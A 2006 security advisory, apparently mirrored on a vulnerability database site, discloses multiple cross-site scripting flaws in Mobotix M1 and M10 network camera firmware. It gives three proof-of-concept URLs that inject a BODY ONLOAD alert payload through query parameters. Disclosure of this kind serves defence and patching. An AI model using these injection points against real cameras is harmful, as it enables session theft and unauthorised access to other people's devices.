Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:12722
HistoryMay 18, 2006 - 12:00 a.m.

Mobotix IP Network Cameras Multiple XSS

2006-05-1800:00:00
vulners.com
8
JSON

Mobotix IP Network Cameras Multiple XSS

Version: Tested on M1 and M10
- M10-V2.0.5.2
- M1-V1.9.4.7

Discovered by: jaime.blasco(at)eazel(dot).es
http://www.eazel.es

Description:

Mobotix is vulnerable to multiple security vulnerabilites that allow cross site scripting flaws.

Due to improper filtering a remote attacker can cause a cross site scripting in these scripts:

http://camera/help/help?%3CBODY%20ONLOAD=alert('www.eazel.es')%3E

http://camera/control/events.tar?source_ip=%3CBODY%20ONLOAD=alert('www.eazel.es')%3E&download=egal

http://camera/control/eventplayer?get_image_info_abspath=%3CBODY%20ONLOAD=alert('www.eazel.es')%3E

The advisorie can be found at : http://www.eazel.es/media/advisory001.html

JSON